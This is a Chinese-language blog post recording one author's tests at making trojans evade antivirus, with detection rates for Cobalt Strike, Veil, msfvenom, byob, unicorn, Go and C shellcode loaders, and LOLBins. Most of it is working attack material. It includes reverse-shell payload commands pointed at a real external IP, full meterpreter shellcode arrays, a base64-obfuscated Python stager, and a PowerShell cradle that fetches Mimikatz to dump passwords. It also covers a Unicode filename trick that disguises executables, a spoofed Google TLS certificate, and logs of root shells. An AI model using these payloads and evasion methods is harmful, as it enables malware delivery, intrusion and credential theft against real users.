常规木马免杀处理-查杀情况记录

Posted on Edited on In Views: Word count in article: 10k Reading time ≈ 37 mins.

常规木马免杀处理-查杀情况记录

cs木马免杀比例

exe64 41/72
exe32 40/72

+upx之后

1
2
3
cs64           30/72       能过火绒    无法过windows defender
自解压打包后    23/71       能过火绒    无法过windows defender   (success)
cs86           45/72       被火绒查杀  无法过windows defender

veil

安装docker:

1
2
3
4
5
6
7
8
9
10
11
12
添加Docker PGP key:
curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -

配置Docker APT repository:
echo 'deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable' | sudo tee /etc/apt/sources.list.d/docker.list

apt-get update
apt-get remove docker docker-engine docker.io
apt-get install docker-ce

systemctl start docker
systemctl enable docker

安装拉取veil镜像:

1
2
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
镜像地址:
https://hub.docker.com/r/mattiasohlsson/veil/

mousepad /etc/docker/daemon.json

{
    "registry-mirrors": [
        "https://1nj0zren.mirror.aliyuncs.com",
        "https://docker.mirrors.ustc.edu.cn",
        "http://f1361db2.m.daocloud.io",
        "https://registry.docker-cn.com"
    ]
}

systemctl daemon-reload
systemctl restart docker

docker pull mattiasohlsson/veil

启动docker:

-v /tmp/veil-output:/var/lib/veil/output:Z是将宿主机的/tmp/veil-output目录映射到docker里面,这样veil生成的payload可以直接在宿主机里使用。

docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil

使用:

veil有两个免杀的工具,Evasion和Ordnance。
Ordnance可生成在Veil-Evasion中使用的shellcode,Evasion是用做文件免杀。

1
2
Veil>: use 1                   #选择Evasion功能
Veil/Evasion>: list            #查看payload列表

veil直接生成exe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
Veil/Evasion>: use 16
Name:          Pure Golang Reverse TCP Stager

set lhost 45.32.137.154
set lport 4466
generate

root@kali:/tmp/veil-output# tree
.
├── catapult
├── compiled
│   └── go_msf.exe
├── handlers
│   └── go_msf.rc
├── hashes.txt
└── source
    └── go_msf.go

root@kali:/tmp/veil-output# cat handlers/go_msf.rc 
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 45.32.137.154
set LPORT 4466
set ExitOnSession false
exploit -j

生成的exe文件被查杀火绒,upx加壳依然被火绒查杀,尴尬

加upx后 virustotal查杀率 37/68

  • veil+mingw+w64(success)
1
2
3
4
5
6
7
Veil>: use 1

Veil-Evasion command: use 7        #选择payload  c/meterpreter/rev_tcp.py

set lhost 45.32.137.154
set lport 4466
generate

用mingw-w64来编译

1
gcc c_msf.c -o c_msf.exe -l ws2_32

火绒查杀exe文件

upx加壳后(火绒未查杀) virustotal查杀率 7/68

msf收到的弹回的shell无法执行命令?失败品。

msfconsole -r 加载.rc文件

msf apk

virustotal查杀率 29/63

未免杀时被查杀比例 57/72

1
msfvenom -p android/meterpreter/reverse_tcp LHOST=45.32.137.154 LPORT=5566 R > test.apk

shellter免杀无效,免杀后exe文件原功能无法使用

msfvenom 捆绑+编码器免杀

1
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' lhost=45.32.137.154 lport=5566 -f exe -o en20.exe

x86/shikata_ga_nai编码器免杀后查杀比例 57/72 加编码器完全无效没卵用

shikata_ga_nai编码+upx加壳免杀后查杀比例 52/72 查杀比例降低了一点

尝试byob僵尸网络(python2)

1
2
3
4
python client.py 45.32.137.154 5566 --name test --compress --freeze --icon tom.jpg

hosting payload at: http://45.32.137.154:5567///payloads/m8V.py
hosting stager at: http://45.32.137.154:5567///stagers/m8V.py

生成payload的目录在\modules文件夹下,两个文件夹,一个payload,一个stager,直接把两个文件夹,复制到kali里面的byob/byob/module里

1
python server.py --host 45.32.137.154 --port 5566

此时服务器已经搭建起来了,接下来我们只需要再另外一个窗口随便生成一个木马,让byob帮我们搭建网站服务器来存储payload

1
2
3
4
5
python client.py 45.32.137.154 5566 --name test1 --compress --freeze --icon tom.jpg

hosting payload at: http://45.32.137.154:5567//payloads/nBa.py

hosting stager at: http://45.32.137.154:5567//stagers/nBa.py

服务启动成功,然后把在windows生成的payload和stager放到属于他们自己的目录(不要乱了啊)

1
2
3
4
5
6
7
payload:./byob/byob/modules/payloads

stagers:./byob/byob/modules/stagers

http://45.32.137.154:5567//payloads/yCN.py

http://45.32.137.154:5567//stagers/yCN.py

运行exe或者test.py文件

python2实验生成的exe或者py文件能过大部分免杀,但是实验用的目标机器在内网,外网没有session上线,外网没测试

byob查杀比例 5/72

unicron

免杀比例 19/72

1
python unicorn.py windows/meterpreter/reverse_https 45.32.137.154 443

会在unicorn目录下生成两个文件: unicorn.rc和powershell_attack.txt,后者是我们需要在目标机上运行的。

转成bat格式,然后下载win10的icon图标:

1
git clone 'https://github.com/B00merang-Project/Windows-10-Icons'
  • 后缀名欺骗

这里选择Windows-10-Icons/256x256/mimetypes/ 下的text-x-generic.png去

1
https://convertico.com/

网站转化PNG图片为ICON,然后打开BAT2EXE转换器,打开powershell_attack.bat然后在顶部加上notepad:

保存为windows 64位invisible的text.exe

然后伪装文件后缀名。
先把文件名改为texttxt.exe, 然后去

1
https://unicode-table.com/en/202E/

复制倒写unicode,文件名就变成了textexe.txt,但实际是一个可执行文件,这招能骗过开启文件后缀名显示的目标机用户。

1
2
3
4
5
msfconsole -r unicorn.rc

load stdapi

shell

shell无法弹出到外网vps?

gobindshell (success)

免杀比例 2/69

go-shellcode

编译生成的exe被查杀

+upx 体积缩小一半 过火绒

1
msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=45.32.137.154 LPORT=2234

能免杀,但是内存加载失败没弹回shell?

shellcode-launcher(x)

c++加载shellcode

1
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=45.32.137.154 lport=2234 -f raw -o shellcode.raw

upx之后还是被火绒查杀

k8 scrun

python加载shellcode

加upx后未报毒

1
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=45.32.137.154 lport=2234 -f c -o shell.c

生成的shell.c文件还需要hex编码

scrun.exe运行时退出,程序运行有问题

go_meterpreter

https://github.com/insightglacier/go_meterpreter

1
2
3
4
5
6
7
go build -ldflags="-H windowsgui -w" .\go_meterpreter.go

此命令编译的程序会sessions die

go build .\go_meterpreter.go

同样会die
1
2
3
4
LHOST  45.32.137.154    yes       The listen address (an interface may be specified)
LPORT  2234             yes       The listen port

windows/meterpreter/reverse_tcp

+upx之后查杀比例: 9/71

缺点是弹外网时会session die, 内网未测试

powershell远程加载mimikatz读取密码

1
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz >> c:\1.txt

SimpleShellcodeInjector加载器

https://github.com/DimopoulosElias/SimpleShellcodeInjector

火绒报毒,upx加壳和不加壳程序运行闪退

1
2
3
4
5
6
7
8
9
10
$ i686-w64-mingw32-gcc SimpleShellcodeInjector.c -o ssi.exe
$ msfvenom -p windows/meterpreter/reverse_https LHOST=45.32.137.154 LPORT=2234 -f c -o msf.txt
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 545 bytes
Final size of c file: 2315 bytes
Saved as: msf.txt

$ cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

msf:

SSL impersonation:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ msfconsole
msf exploit(multi/handler) > use auxiliary/gather/impersonate_ssl
msf auxiliary(gather/impersonate_ssl) > set RHOST www.google.com
RHOST => www.google.com
sf auxiliary(gather/impersonate_ssl) > run

[*] www.google.com:443 - Connecting to www.google.com:443
[*] www.google.com:443 - Copying certificate from www.google.com:443
/C=US/ST=California/L=Mountain View/O=Google LLC/CN=www.google.com 
[*] www.google.com:443 - Beginning export of certificate files
[*] www.google.com:443 - Creating looted key/crt/pem files for www.google.com:443
[+] www.google.com:443 - key: /home/gweeperx/.msf4/loot/20180816131826_default_216.58.212.36_www.google.com_k_829605.key
[+] www.google.com:443 - crt: /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_c_997519.crt
[+] www.google.com:443 - pem: /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_p_032017.pem
[*] Auxiliary module execution completed

Handler:

1
2
3
4
5
6
7
8
9
10
11
12
msf auxiliary(gather/impersonate_ssl) > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(multi/handler) > set HandlerSSLCert /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_p_032017.pem
HandlerSSLCert => /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_p_032017.pem
msf exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:443

py加载

1
2
3
4
5
6
7
8
9
import base64,sys
import ctypes

whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
    ctypes.windll.user32.ShowWindow(whnd, 0)
    ctypes.windll.kernel32.CloseHandle(whnd)

exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzQ1LjMyLjEzNy4xNTQnLDIyMzQpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSk=')))

base64 decode之后

1
2
3
4
5
6
7
8
9
10
11
12
13
import socket,struct,time
for x in range(10):
	try:
		s=socket.socket(2,socket.SOCK_STREAM)
		s.connect(('45.32.137.154',2234))
		break
	except:
		time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
	d+=s.recv(l-len(d))
exec(d,{'s':s})

能连上,执行不了命令,需要另外改代码?

go内联c加载+go嵌入shellcode

windows 下 gcc/g++ 的安装

  • goshell(success)

查杀比例 15/64

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=45.32.137.154 lport=2234 -f c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
"\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
"\x49\xbc\x02\x00\x08\xba\x2d\x20\x89\x9a\x41\x54\x49\x89\xe4"
"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5"

go build -ldflags=”-H windowsgui -w”

源码见goshell

+upx壳后外网msf成功上线

  • cingo

64 bit gcc install

64 bit gcc

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=45.32.137.154 lport=2234 -f c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
"\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
"\x49\xbc\x02\x00\x08\xba\x2d\x20\x89\x9a\x41\x54\x49\x89\xe4"
"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5"

需要64位gcc

1
2
3
4
5
6
7
8
9
10
11
12
13
package main

import "C"
import "unsafe"

func main() {
    buf := ""
    buf += "xddxc6xd9x74x24xf4x5fx33xc9xb8xb3x5ex2c"
    ...
    buf += "xc9xb1x97x31x47x1ax03x47x1ax83xc7x04xe2"
    shellcode := []byte(buf)
    C.call((*C.char)(unsafe.Pointer(&shellcode[0])))
}

需要调用c语言代码,待完善

在 Go 语言中调用 C 代码

go-AES-shellcode (success)

A Trinity of Shellcode, AES & Golang

0x14-SLAE64-crypter

  • windows上面编译gocrypter报错:
1
shellcoderun\shellcoderun.go:5:10: fatal error: sys/mman.h: No such file or directory

原因:

1
<sys/mman.h>是一个unix头文件,在windows上不可用
  • linux上编译(只能在linux机器上弹shell)

编译成功

生成payload

1
msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp LHOST=45.32.137.154 LPORT=2344 > gocryptpayload
1
2
3
4
5
6
root@kali:~/go-crypter# cat gocryptpayload | xxd
00000000: 6a29 5899 6a02 5f6a 015e 0f05 4897 48b9  j)X.j._j.^..H.H.
00000010: 0200 0928 2d20 899a 5148 89e6 6a10 5a6a  ...(- ..QH..j.Zj
00000020: 2a58 0f05 6a03 5e48 ffce 6a21 580f 0575  *X..j.^H..j!X..u
00000030: f66a 3b58 9948 bb2f 6269 6e2f 7368 0053  .j;X.H./bin/sh.S
00000040: 4889 e752 5748 89e6 0f05                 H..RWH....

aes加密payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@kali:~/go-crypter# ./go-crypter encrypt "lucifer110000000" gocryptpayload
Reading from file at gocryptpayload
Input size is: 74 bytes
Key size is: 16 bytes
Calling encrypt...
Result size is: 96 bytes
Saved to gocrypter.111526.out
root@kali:~/go-crypter# cat gocrypter.111526.out | xxd
00000000: aab9 7c35 31e4 b4ba d0a0 2551 44ec 373d  ..|51.....%QD.7=
00000010: c3da 0026 ba7c bb5a 11d8 4b73 41bf bf50  ...&.|.Z..KsA..P
00000020: dce1 64a8 bf65 712a fba4 5e04 0780 3b8f  ..d..eq*..^...;.
00000030: 56ac 1f9b cf98 db99 edc6 6a95 dbb1 b538  V.........j....8
00000040: aebf 740e 93ca cda6 42ec ebf7 d1a9 56c2  ..t.....B.....V.
00000050: 9517 b1ac fd51 c14b 28ad 886c beb8 a0f8  .....Q.K(..l....

解密payload

1
2
3
4
5
6
7
8
9
10
11
12
13
root@kali:~/go-crypter# ./go-crypter decrypt "lucifer110000000" gocrypter.111526.out
Reading from file at gocrypter.111526.out
Input size is: 96 bytes
Key size is: 16 bytes
Calling decrypt...
Result size is: 74 bytes
Saved to gocrypter.111737.out
root@kali:~/go-crypter# cat gocrypter.111737.out | xxd
00000000: 6a29 5899 6a02 5f6a 015e 0f05 4897 48b9  j)X.j._j.^..H.H.
00000010: 0200 0928 2d20 899a 5148 89e6 6a10 5a6a  ...(- ..QH..j.Zj
00000020: 2a58 0f05 6a03 5e48 ffce 6a21 580f 0575  *X..j.^H..j!X..u
00000030: f66a 3b58 9948 bb2f 6269 6e2f 7368 0053  .j;X.H./bin/sh.S
00000040: 4889 e752 5748 89e6 0f05                 H..RWH....

run payload

1
2
3
4
5
6
7
root@kali:~/go-crypter# ./go-crypter run "lucifer110000000" gocrypter.111526.out
Reading from file at gocrypter.111526.out
Input size is: 96 bytes
Key size is: 16 bytes
Calling decrypt...
Result size is: 74 bytes
Calling run...

外网msf success!!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell x64/linux               45.32.137.154:2344 -> 182.104.14.146:58604 (182.104.14.146)

msf5 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
ls
cli
crypter
go-crypter
gocrypter.111526.out
gocrypter.111737.out
gocrypter.go
gocryptpayload
shellcoderun

使用nc -lvp 2344监听也可以

1
2
3
4
5
6
7
python -c 'import pty; pty.spawn("/bin/bash")'
root@kali:/root/go-crypter# id
id
uid=0(root) gid=0(root) groups=0(root)
root@kali:/root/go-crypter# whoami
whoami
root

插入shellcode

1
2
3
4
5
6
7
8
9
10
#include <windows.h>
#include <iostream>
int main (int argc, char **argv) {
  char b[] = {/* 插入经过与'x'异或操作后的 shellcode 代码,例如:0x4C,0x4F, 0x4C */};
  char c[sizeof b];
  for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';}
  void *exec = VirtualAlloc (0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  memcpy (exec, c, sizeof c);
  ((void(*)()) exec)();
}

CPLResourceRunner

用Cobalt Strike生成shellcode

Attacks -> Packages -> Windows Executable (s) -> Output => RAW (x86)

1
cat shellcode.txt | sed 's/[, ]//g; s/0x//g;' |tr -d '\n' | xxd -p -r | gzip -c | base64 > b64shellcode.txt

powershell加载(MMFml)

code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
namespace mmfExeTwo
{
   using System;
   using System.IO.MemoryMappedFiles;
   using System.Runtime.InteropServices;

   class Program
   {

       private delegate IntPtr NewDelegate();

       // To handle the location by applying the appropriate type
       // We had to create a delegate to handle the the pointer to the location where we shim in the shellcode
       // into the Memory Mapped File.  This allows the location of the opp code to be referenced later for execution
       private unsafe static IntPtr GetShellMemAddr()
       {
           // 64bit shell code.  Tested on a win10 system.  Injects "cmd -k calc"
           // was generated vanilla using "msfvenom -p windows/exec CMD="cmd /k calc" EXITFUNC=thread C -f powershell"
           var shellcode = new byte[]
               {
                    0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
                    0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,
                    0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
                    0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,
                    0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,
                    0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,
                    0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,
                    0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,
                    0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,
                    0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,
                    0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,
                    0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
                    0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,
                    0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,
                    0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
                    0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,
                    0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00
               };

           MemoryMappedFile mmf = null;
           MemoryMappedViewAccessor viewaccessor = null;

           try
           {
               /* The try block creates the MMF and assigns the RWE permissions
               The view accessor is created with matching permissions
               the shell code from GetShellMemAddr is written to MMF
               then the pointer is gained and a delegate is created to handle pointer value
               so that it can be passed in therms of the returned function */

               mmf = MemoryMappedFile.CreateNew("__shellcode", shellcode.Length, MemoryMappedFileAccess.ReadWriteExecute);
               viewaccessor = mmf.CreateViewAccessor(0, shellcode.Length, MemoryMappedFileAccess.ReadWriteExecute);
               viewaccessor.WriteArray(0, shellcode, 0, shellcode.Length);
               var pointer = (byte*)0;
               viewaccessor.SafeMemoryMappedViewHandle.AcquirePointer(ref pointer);
               var func = (NewDelegate)Marshal.GetDelegateForFunctionPointer(new IntPtr(pointer), typeof(NewDelegate));
               return func();
           }
           catch
           {
               return IntPtr.Zero;
           }
           finally // You should always clean up after yourself :)
           {
               viewaccessor.Dispose();
               mmf.Dispose();
           }
       }

       static void Main(string[] args)
       {
           GetShellMemAddr();
       }
   }
}
1
2
3
msfvenom -p windows/x64/exec CMD="cmd.exe -c calc.exe" -f csharp

Invoke-MMFml

Lolbins白利用加载shellcode

Living-Off-the-Land Binaries(生活在陆地上的二进制)

  • mshta

payload:

1
2
3
4
5
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.174.134 LPORT=53 -f raw > shellcode.bin

cat shellcode.bin | base64 -w 0

mshta.exe http://192.168.174.134/qing.hta

替换模板

shellcode替换位置:

1
Dim code : code = ""
  • msiexec

加载payload txt:

1
2
3
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.174.134 LPORT=4444 -f msi > qing.txt

C:\Windows\System32\msiexec.exe /q /i http://192.168.174.134 /qing.txt

加载dll:

1
2
3
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.174.134 LPORT=53 -f dll > qing.dll

msiexec /y C:\qing.dll
  • Msbuild
1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe qing.xml

模板

  • Installutil

编译:

1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.Ente rpriseServices.dll /r:System.IO.Compression.dll /target:library /out:qing.exe /keyfile:C:\Users\John\Desktop\installutil.snk /unsafe C:\Users\John\Desktop\installutil.cs

执行:

1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= / LogToConsole=false /U qing.exe

详细

wmic

1
wmic os get /FORMAT:"http://example.com/evil.xsl"

模板

csc

1
2
3
msfvenom ‐p windows/x64/shell/reverse_tcp LHOST=192.168.174.132 LPORT=53 ‐ f csharp

